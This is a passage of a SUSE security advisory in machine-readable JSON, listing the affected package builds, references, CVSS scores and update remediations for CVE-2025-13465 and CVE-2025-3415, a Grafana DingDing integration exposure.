"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-13465",
"url": "https://www.suse.com/security/cve/CVE-2025-13465"
},
{
"category": "external",
"summary": "SUSE Bug 1257321 for CVE-2025-13465",
"url": "https://bugzilla.suse.com/1257321"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.2,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T10:11:52Z",
"details": "important"
}
],
"title": "CVE-2025-13465"
},
{
"cve": "CVE-2025-3415",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-3415"
}
],
"notes": [
{
"category": "general",
"text": "Grafana is an open-source platform for monitoring and observability. The Grafana Alerting DingDing integration was not properly protected and could be exposed to users with Viewer permission. \nFixed in versions 10.4.19+security-01, 11.2.10+security-01, 11.3.7+security-01, 11.4.5+security-01, 11.5.5+security-01, 11.6.2+security-01 and 12.0.1+security-01",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-3415",
"url": "https://www.suse.com/security/cve/CVE-2025-3415"
},
{
"category": "external",
"summary": "SUSE Bug 1245302 for CVE-2025-3415",
"url": "https://bugzilla.suse.com/1245302"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
